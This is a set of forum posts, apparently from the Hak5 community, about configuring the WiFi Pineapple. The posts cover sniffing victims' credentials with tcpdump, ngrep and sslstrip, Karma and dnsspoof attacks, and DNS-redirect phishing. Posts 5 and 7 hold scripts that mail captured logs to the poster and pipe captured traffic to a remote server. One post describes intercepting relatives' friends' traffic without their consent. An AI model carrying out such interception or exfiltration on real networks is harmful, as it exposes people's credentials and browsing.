Posts posted by telot

  1. http://arstechnica.com/tech-policy/2012/06/confirmed-us-israel-created-stuxnet-lost-control-of-it/

    To be honest, I'm happy. I thought it was the Russians trying to push the Iranians to increase tension with Israel so the Cold War could restart/continue.

    I'm not seeing any proof or confirmation that the US/Israel made it. They just claim it's detailed in some upcoming book. This could be Ars just being Ars again (sensationalistic and over dramatic)...

    telot

  2. Good from-the-field knowledge petertfm! Thanks for the info

    I always run my pineapple off of ~5 volts from USB - not batts. I've done tests (you can search them out here on the forums) that show 5 volts does not affect the wifi range at all compared to 12 volts. The thing you have to keep in mind with batteries is that the higher the voltage, the fewer amps your pineapple eats up. For example, a 12v battery with 1000mah (milliamp hours) will last waaay longer than a 5v battery with 1000mah. It's the amps that keep your pineapple alive, not the voltage rating.

    telot

  3. Ngrep sounded great on the mark 3 but I know it was resource hungry just like sslstrip. I want to collect credentials, so running sslstrip would be #1 and something like ngrep would be cool too. But would it be easier to just find that data afterwards, like with a pcap file from tcpdump?

    so I was thinking maybe we could use an offsite toolkit for the pineapple to do this kind of stuff and make it as easy and cool looking like the pineapple, possibly have a feature that formats a thumb drive and sets up the partitions plus files like pre-installed packages and roll pages?

    BTW where is ngrep? It's stated as "MITM tools: urlsnarf, dnsspoof & ngrep" in the hak shop?

    What are your opinions on collecting data? Have it all on the pineapple or some off site?

    ngrep is only good for catching plaintext credentials - and you have to specify quite precisely what you want out of it (ftp logins for example). If you're already tcpdumping, you're going to get every plaintext credential anyways, you'll just have to search them out in the capture file - so if you're comfortable in wireshark with some packet analysis, you'll be fine - but if you want something easy, or more likely, if you're targeting a victim for one type of login (their company ftp say...) ngrep is the way to go. Ngrep was in the gui on the mark3 (and still is) but it didn't make the transition to the mark4 for some reason...you'd have to ask Seb. I believe it's still installed on the mark4, just not in the UI (command line ftw anyways right?) - but I never use it lol, I'm a pcap man.

    As for collecting data on or off site - I don't think you'd have any problem running tcpdump, ngrep, and sslstrip and dumping it all to a big fat USB stick and then scp'ing it off at your leisure - give it a shot, there's no harm in trying :)

    telot

  4. Darren interviewed Eben (creator and founder of raspi) at MakerFaire last week...I smell an upcoming project

    I've had mine on order for months - finally got the confirmation email that it will ship in another 2-3 weeks. I can't friggin wait

    telot

  5. Anyone here use the cron on the pineapple? I can't seem to get it to work. Here's my crontab entry from the 'Jobs' gui:

    */5 * * * * /www/pineapple/scripts/cleanup.sh

    */5 * * * * /www/pineapple/ssh/ssh-keepalive.sh

    */5 * * * * /usb/pinesave/telotreport.sh

    Inside /usb/pinesave/telotreport.sh:

    #!/bin/bash

    TODAY=$(date +"%m-%d-%y")

    # start a fresh report file
    rm /usb/emailreport.log

    # size of today's capture file
    du -h /usb/cap.$TODAY.pcap > /usb/emailreport.log

    cat /www/pineapple/logs/associations.log >> /usb/emailreport.log

    # dump the urlsnarf log, then restart urlsnarf
    # (absolute paths so cron finds the scripts whatever its working directory is)
    cat /www/pineapple/logs/urlsnarf.log >> /usb/emailreport.log
    /usb/killurlsnarf.sh
    /usb/starturlsnarf.sh
    cat /www/pineapple/logs/dnsspoof.log >> /usb/emailreport.log

    cat /proc/net/arp >> /usb/emailreport.log

    # note: only the final grep in this chain is redirected into the report; the earlier cats go to stdout
    cat /tmp/dhcp.leases; echo '\n'; cat /proc/net/arp; echo '\n'; grep KARMA /tmp/karma.log | grep -v -e enabled | grep -v -e malloc | grep -v -e CTRL_IFACE | grep -v -e KARMA_STATE | grep -v -e Request >> /us$

    # mail the finished report
    ssmtp -v telot@telotsemail.com < /usb/emailreport.log
    

    I know, I know, it's a very rough draft of my email reports module I'll make someday. So as you can see, I remove the old log, take a size reading on today's capture file, cat the urlsnarf.log and restart it, then cat a bunch of other things and email it off. Just running the script works great - I get the email and it's got all the goodies in it. I was hoping to get this to be sent to me every hour or two, but wanted to test it on 5 minute intervals. Most unfortunately I don't ever receive any emails. So I ran a test - I put a script in /www/pineapple/scripts/ called test.sh - in it is simply:

    #!/bin/sh
    touch /www/testthis
    

    I added it to the cron (again, on the Jobs page) for 5 minute intervals - now it looks like this:

    */5 * * * * /www/pineapple/scripts/cleanup.sh

    */5 * * * * /www/pineapple/ssh/ssh-keepalive.sh

    */5 * * * * /www/pineapple/scripts/test.sh

    Came back 6 minutes later and ls /www/ and testthis is there. So what is stopping telotreport.sh from working? They're both chmod +x'd - same permissions as the cleanup.sh script. Any advice would be greatly appreciated. Thanks guys

    telot
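    A cron-friendly way to build the same report, added here as an example (this is not the poster's script or Hak5 code). It uses /bin/sh, which is what the working test.sh above runs under, absolute paths only, since crond does not start in the script's directory, and one redirect around the whole report so every section lands in the file rather than on crond's stdout. The log tree under the first argument, the recipient address and the cron line are assumptions; the system files the original reads (/tmp/dhcp.leases, /proc/net/arp, /tmp/karma.log) are mapped under that tree so the script can run offline in a temp dir.

```shell
# Added example, not the original poster's script. Assumes POSIX sh (BusyBox
# ash is fine) with date, du, grep, mktemp and mv available.

# Append a labelled copy of one log file; a missing file is noted, not fatal.
section() {
    printf '== %s ==\n' "$1"
    if [ -r "$2" ]; then cat "$2"; else printf '(missing: %s)\n' "$2"; fi
    printf '\n'
}

# Build the report for the tree under $1 into $2. Everything inside the braces
# goes to one temp file, which is renamed at the end so a half-written report
# is never mailed. Returns 0 on success.
build_report() {
    root=$1
    out=$2
    today=$(date +"%m-%d-%y")
    {
        printf '== capture size ==\n'
        du -h "$root/cap.$today.pcap" 2>/dev/null || printf '(no capture for %s)\n' "$today"
        printf '\n'
        section "associations" "$root/logs/associations.log"
        section "urlsnarf"     "$root/logs/urlsnarf.log"
        section "dnsspoof"     "$root/logs/dnsspoof.log"
        section "dhcp leases"  "$root/dhcp.leases"     # stands in for /tmp/dhcp.leases
        section "arp table"    "$root/arp"             # stands in for /proc/net/arp
        printf '== karma ==\n'
        # same filter as the original: keep KARMA lines, drop the noisy ones
        { grep KARMA "$root/karma.log" 2>/dev/null \
            | grep -v -e enabled -e malloc -e CTRL_IFACE -e KARMA_STATE -e Request; } || true
        printf '\n'
    } > "$out.tmp" && mv "$out.tmp" "$out"
}

# Assumed cron entry and mail step (placeholder address). Redirecting the job's
# own stdout/stderr to a file is what shows the error when a job fails silently:
#   */5 * * * * /usb/pinesave/telotreport.sh >> /usb/telotreport.cron.log 2>&1
#   ssmtp -v recipient@example.invalid < /usb/emailreport.log

# Stand-alone run on a constructed log tree.
demo() {
    tree=$(mktemp -d)
    mkdir -p "$tree/logs"
    printf '00:11:22:33:44:55 associated\n' > "$tree/logs/associations.log"   # constructed
    printf 'KARMA: Successful association of 00:11:22:33:44:55\nKARMA: Request ignored\n' \
        > "$tree/karma.log"                                                     # constructed
    build_report "$tree" "$tree/emailreport.log"
    cat "$tree/emailreport.log"
    rm -rf "$tree"
}

demo
```

    Missing logs show up as a "(missing: ...)" line instead of aborting the run, so a report still arrives when one tool is not running.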

  6. I'm having some issues with SSH. I put in my autossh command, set up my relay server - I press Connect and tell it to be persistent - all is good. It's the SSH on boot that I'm having troubles with. Looking at the code, it seems the button just puts the autossh command into /etc/rc.local - well for some reason this is not happening. After pressing the button on the gui page, it stays "disabled", and when I cat /etc/rc.local there's no autossh entry. I tried to manually paste it in there (above the line that says "Add your commands above this line") and reboot, but it still does not connect upon bootup. Did something change in how the pineapple handles rc.local in the newest firmware? To be honest, I never messed with autossh before 2.1.0, so I guess I don't know if it was broken before or only after...Can anyone else confirm/deny rc.local issues? Thanks!

    EDIT: I threw in some other stuff in the rc.local and it seems to be loading (iptables stuff for wan port). Maybe I'm on crack or something?

    telot

  7. Ok - the pragmatic side of me kicked in and settled for an ssh pipe instead of sshfs. I did a

    tcpdump -i eth0 -n net 192.168.1.0/24 | ssh -p 2222 telot@internalIP "cat > /home/telot/pinecap.pcap" &

    keep in mind I use port 2222 as my standard ssh port. It seems to be holding up now - it borked the mark3 at first, but that's probably because I was running everything under the sun (ngrep, urlsnarf, dnsspoof - etc).

    Strange thing is, when I do this the pinecap.pcap on my cloud server isn't recognized as a valid file by wireshark. Very odd as all the data seems to be there. Any wireshark fanatics out there can maybe shed some light on why this may be?

    telot
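    A quick way to tell whether a file like the pinecap.pcap above is really a capture, added here as an example (not code from the post or from Hak5): the first four bytes of a pcap or pcapng file are a fixed magic number, so a file that starts with anything else, such as the decoded text tcpdump prints when it is run without -w, will not open in Wireshark no matter how complete it looks. The check, the sample files and the suggested pipe are my own; the tcpdump flags (-w - to write pcap to stdout, -U for packet-buffered output) are real.

```shell
# Added example, not from the original post. Assumes POSIX sh with od, tr,
# head, cut and mktemp (BusyBox provides them all).

# Print the first four bytes of a file as lowercase hex, no separators.
magic_of() {
    od -An -tx1 -N4 "$1" | tr -d ' \n'
}

# Return 0 when the file begins with a pcap or pcapng magic number, else 1.
is_pcap() {
    case "$(magic_of "$1")" in
        d4c3b2a1|a1b2c3d4) return 0 ;;   # classic pcap, microsecond timestamps
        4d3cb2a1|a1b23c4d) return 0 ;;   # classic pcap, nanosecond timestamps
        0a0d0d0a)          return 0 ;;   # pcapng section header block
        *)                 return 1 ;;
    esac
}

# Classify two constructed sample files: a bare pcap global header, and the
# decoded text that "tcpdump ... | ssh host 'cat > file'" produces without -w.
demo() {
    dir=$(mktemp -d)
    # constructed: 24-byte little-endian pcap header (magic, v2.4, snaplen 65535, linktype 1)
    printf '\324\303\262\241\002\000\004\000\000\000\000\000\000\000\000\000\377\377\000\000\001\000\000\000' \
        > "$dir/good.pcap"
    # constructed: one line of tcpdump's human-readable output
    printf '12:00:00.000001 IP 192.168.1.10.51234 > 192.168.1.1.53: 1234+ A? example.com. (29)\n' \
        > "$dir/text.pcap"
    for f in "$dir/good.pcap" "$dir/text.pcap"; do
        if is_pcap "$f"; then
            echo "$(basename "$f"): pcap, magic $(magic_of "$f")"
        else
            echo "$(basename "$f"): not a pcap file (starts with '$(head -n1 "$f" | cut -c1-16)')"
        fi
    done
    rm -rf "$dir"
}

# The pipe that yields a Wireshark-readable file: -w - writes pcap to stdout,
# -U flushes each packet so the remote file is usable before tcpdump exits.
#   tcpdump -i eth0 -n -U -w - net 192.168.1.0/24 | ssh -p 2222 user@host "cat > pinecap.pcap"

demo
```

    Running it prints one line per sample file; the text file is rejected because its first bytes are the ASCII timestamp, not a magic number.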

  8. And with "--force-depends" option ?

    opkg install sshfs --force-depends

    I did not try myself, just an idea :)

    I took your advice WM - thank you. I got it installed, but now it stalls with a Fuse error telling me to modprobe fuse (to which I insmod fuse - got no errors - but lsmod shows no fuse still!). Here's the command I'm trying to run:

    sshfs -o ssh-command="ssh -p 2222" telot@internalIP: /root/telot

    Very frustrating stuff...I'm half thinking about just buying another mark4 for the extra features anyways...lol this might be my impetus

    telot

  9. Good afternoon everyone!

    On this lovely rainy Memorial Day weekend, I'm trying to get my old MarkIII to be useful once more. My brother recently moved in with us for the summer, and I think it'd be a great public service for me to educate him and his friends about the dangers of open wifi connections. My MarkIII has been sitting collecting dust for the past several months, since the MarkIV came into town, so I thought I'd hook up the MarkIII to my internal network and have it on all the time - maybe even come up with a "Wall of Shame" kind of deal - showing the kids the urlsnarf/ngrep/whatever data I cap'd off them. That's all well and good - I changed the network settings on the MarkIII to match my internal network and whatnot and it's happily karma'ing up victims left and right. Now comes the problem.

    I'd of course like to tcpdump all the traffic on eth0, but the markIII is so short in the storage department, I thought hey! what a great application of sshfs! Unfortunately when I do a

    opkg update

    opkg install sshfs

    It comes back with an error:

    Collected errors:

    * satisfy_dependencies_for: Cannot satisfy the following dependencies for sshfs:

    * kernel (= 3.3.7-1-607db4585f74c0eb4be22dc576d44e8e) *

    * opkg_install_cmd: Cannot install package sshfs.

    Any idea on how to fix this? I googled my ass off and came back with squat.

    Thanks for any help guys, as always

    telot

  10. Excellently done! Can't wait to try it out!

    :::Picks up phone to call friendly Nexus owner down the street:::...

    Edit: Did you make any attempts at mounting the microSD storage for use on the pineapple? That would surely be total win!

    telot

  11. With the mark2, you'll have to use a program on the laptop you have sharing its internet connection with the pineapple. It's called wireshark and it's your new best friend. Capture your eth0 or local area connection (the one you have plugged into the pineapple) and watch those packets stream by. You can also do this with your mark4, but with a USB drive in the mark4, you can do it all on the pineapple by installing/running tcpdump. Then you can view the capture file (all the sniffed traffic) later on any computer with wireshark.

    See my guides on both configuring a USB drive and setting up tcpdump here:

    https://github.com/sebkinne/wifipineapple/wiki/tcpdump

    Learning to properly and effectively use wireshark will take some googling and to get good at deep packet analysis will require dozens of hours of practice.

    Oh yeah, and there's also urlsnarf, that kind of sniffs traffic too...but someone else will have to fill you in on that as I don't really use it.

    Hope this helps!

    telot

  12. I use a different method with my pineapple. I prefer not to use arp-based spoofing attacks as I've had it set off alarms in certain victims. Without going into a 10 page explanation, simply put -

    I prefer to create my own DNS zone files and host them on a remote bind9 DNS server. The DNS server redirects all the desired sites to an apache2 server. This way the victim can still get internet if they're not going to one of the phish'd sites.

    The apache2 server is configured exactly like the httpd server on the pineapple would be. Since it is over the internet I prefer to use apache for security reasons.

    Definitely need to brush up on my PHP : (

    That sounds awesome bobbi! I'm sure I wouldn't be the only one who'd love a how-to guide on this. If you're up to it, I think it'd be a great addition to combine with the other remote server based features like reverse ssh, cron'd remote log uploading, etc

    telot

  13. As long as a VPN or proxy exists, no website can be 100% blocked.

    However, an ISP could always block these technologies, if they are using deep packet inspection, like how China did with TOR.

    Then we could be doomed.

    Oh come on Inf, you know it's a cat and mouse game - they'll block VPN, we'll use ssh tunnels - they'll block ssh tunnels, we'll use TOR - they'll block TOR, we'll use I2P - they'll block I2P, we'll invent a new form of dark net or tunneling or whatever. It's the hacker mentality and we have the upper hand...because we as a community are smarter than they are :)

    telot

  14. Darren, man, I wish nothing but the best for you, Snubsie, and the entire Hak5 crew. I've recently found this show and am VERY fond of it...it's like my geek friends showing up in my living room to take the time to educate me in a very down to earth way on specific things that are of extreme interest to me.

    :::Aww yeah face:::

    Haha I've felt the same way about the show - It reminds me of in college, where we ran a small tutoring group for the philosophy department, where we'd drink beers and help each other out (yes, I graduated psy/phil major...biggest regret of my adult life is not going into comp sci). This is exactly how Hak5 feels, except it's way more relevant to my life now that I have a real job lol. I too hope things don't change, but I believe during every single merger/buy out in the history of the world the company doing the merging/buying has said "Nothing will change"...but something ALWAYS changes - particularly with a publicly traded company where revenues must increase every single year. I'm not saying the change is always bad - these types of things are never black and white. The company I work for was bought out 4 years ago and it's been a great thing - we have more personnel resources, our business has expanded, and we have a bigger checkbook for investing in our inventory (i.e. macbook pros instead of 5 year old shitboxes). Hak5 has a lot going for it - the longest running show on rev3, a successful store, and one helluva dedicated community - no other rev3 show can claim any of that like hak5 can. If I had to guess I'd say that some of the more mainstream and funny shows (the social engineering show, maybe epic mealtime) could transition to television - but I'd guess the uber geeky shows will stay on the internet. Hopefully Discovery Networks will have learned from SHOWCASE/PurePwnage's mistake and not take something so esoteric and geeky as a show about hacking and try and bring it to the mainstream. Here's to hoping and good luck to all the hak5 crew - keep up the great work despite any adversity and we'll be here watching and supporting!

    telot

  15. I have the same setup you do and Mac is very temperamental with ICS: first thing, go over this post in the forums, http://forums.hak5.org/index.php?showtopic=25889

    The long and the short is you will have to set your USB adapter to 192.168.2.1 as Mac only runs ICS over that exact IP address - next plug the ethernet cable from the USB dongle into the LAN/POE port on the pineapple, then you will have to set the LAN/POE on the pineapple to IP (vi /etc/config/network) 192.168.2.X (anything except 1), subnet mask of 255.255.255.0 and a gateway of 192.168.2.1 since it is treating your laptop LAN as the gateway. Once all this is set up you might have to power cycle the pineapple and then disable/enable ICS on the Mac; sometimes you have to cycle ICS a couple times - don't ask me why, it is just Mac's annoyances. Do not run the shell scripts for auto setup as they are written for Linux, and even though Mac has bash it doesn't matter, ICS ONLY works on 192.168.2.1. If I am wrong on any of this info please correct me but this is what I have found with my setup.

    All fine advice for someone with Mac OSX, but the OP is running a flavor of Ubuntu :)

    telot

  16. This might be a silly question, but which Ethernet port on the pineapple are you plugging in to?

    Despite your more custom setup with the MB Air, you seem to be doing everything right. If you're plugging in to the LAN port instead of the PoE port, that could explain all your troubles here. If you are using the PoE port and it's not working, load a bt5 live disk on a friend's computer that has a proper Ethernet port on it, as that is the major difference between your setup and the norm. Good luck

    telot

  17. then I receive this error message:

    BusyBox v1.19.3 (2012-02-21 19:25:47 GMT) built-in shell (ash)

    Enter 'help' for a list of built-in commands.

    _______ ________ __ \

    | |.-----.-----.-----.| | | |.----.| |_ \ \

    | - || _ | -__| || | | || _|| _| \ \ \

    |_______|| __|_____|__|__||________||__| |____| <, .v , // ) ) ) ) )

    |__| W I R E L E S S F R E E D O M \\; \// // / / /

    ATTITUDE ADJUSTMENT (bleeding edge, r29839) ---------- ;\\|||//; / /

    * 1/4 oz Vodka Pour all ingredients into mixing ,'<\/><\/` /

    * 1/4 oz Gin tin with ice, strain into glass.,.`X/\><\\>`

    * 1/4 oz Amaretto ;>/>><\\><\/`

    * 1/4 oz Triple sec |<\\>>X/<>/\|

    * 1/4 oz Peach schnapps `<\/><\/><\\;

    * 1/4 oz Sour mix '/\<>/\<>/'

    * 1 splash Cranberry juice `<\/><;`

    -----------------------------------------------------WiFi_Pineapple MKIV

    root@Pineapple:~# Type nano /etc/config/network

    -ash: Type: not found

    root@Pineapple:~# nano /etc/config/network

    Error opening terminal: xterm-256color.

    root@Pineapple:~# nano /etc/config/network

    Error opening terminal: xterm-256color.

    root@Pineapple:~#

    http://lmgtfy.com/?q=Error+opening+terminal%3A+xterm-256color.

  18. The topic of dyndns came up in another thread, and Mr. Protocol was somewhat incorrectly dismissive of the idea. Also, you all seem to go to great lengths with reverse-ssh in order to access your pineapples remotely. I'm here to tell you that's quite unnecessary. You say carriers block port 22? I'm here to say that's dead wrong. They block everything by default and direct access to your pineapple is just a phone call away. Let me explain.

    Mobile termination is a phrase used in the cellular industry meaning that the device is capable of being reached from the internet. For instance, a normal smartphone can access the internet just fine, but if you get its IP address and try pinging it/accessing it from a computer, you'll be blocked. Hence the reverse-tcp action. Well, turns out all you have to do is call up your carrier and request a specialized option on your cell plan called...you guessed it...mobile termination. Now, just calling up the 1800 number of verizon and demanding mobile termination from the first person that answers won't get you anywhere. With the CDMA carriers at least, you can use the phrase "Public IP address - not a private one like I've got, like you give out to smart phones - I need a PUBLIC ip address...Yes, this is for an M2M application" - you can even request a public STATIC ip address if you so wish...though Verizon will try and charge you a one time $500 setup fee for your entire account...you can negotiate with them however, saying you've only got one line of service you want it for (I've seen them give it away for free). Sprint is much easier, you ask for the public static IP and they charge you an extra $3 bucks a month for it. AT&T on the other hand, you need to request a special APN and lucky for you, I've done all the research on which of their hundreds of APNs is the best for us. The APN is called: I2GOLD - it's mobile terminated and public. So if you want a static IP (nice to have in general if you ask me...) or if you want to stick with dynamic and use a service like dyndns - either way you're no longer depending on having an always-on server reverse-ssh'ing to your pineapple - which is really just another component with the possibility of failure. This reduces the total possible failure points by 3 (ssh connection to server, server hardware fail, or server internet provider fail). So this is where I can see using dyndns on the pineapple if you setup a 3G modem for mobile termination.

    This is how I connect to my pineapple and it works great. Just plug in my 3G dongle and ssh root@telot'sStaticIP or root@telot'sdyndnshostname and off I go. It might not be the best way for some, but I have a feeling a couple people could benefit from this solution. Hope this little primer helps

    telot

  19. Petertfm is saying instead of tethering with bluetooth, tether with wifi. Most smartphones support creation of a wifi hotspot. If making money on a train is all you're after - why use a pineapple? Just turn on the hotspot feature on your phone and charge people. If you don't have that feature on your phone, buy an openwrt router that supports the BT tether and off you go - or you could just flash openwrt onto your pineapple, removing all the cool features, and load up the tethering packages. Pineapples are meant to be pen testing security-related devices, not money making fons imho

    telot
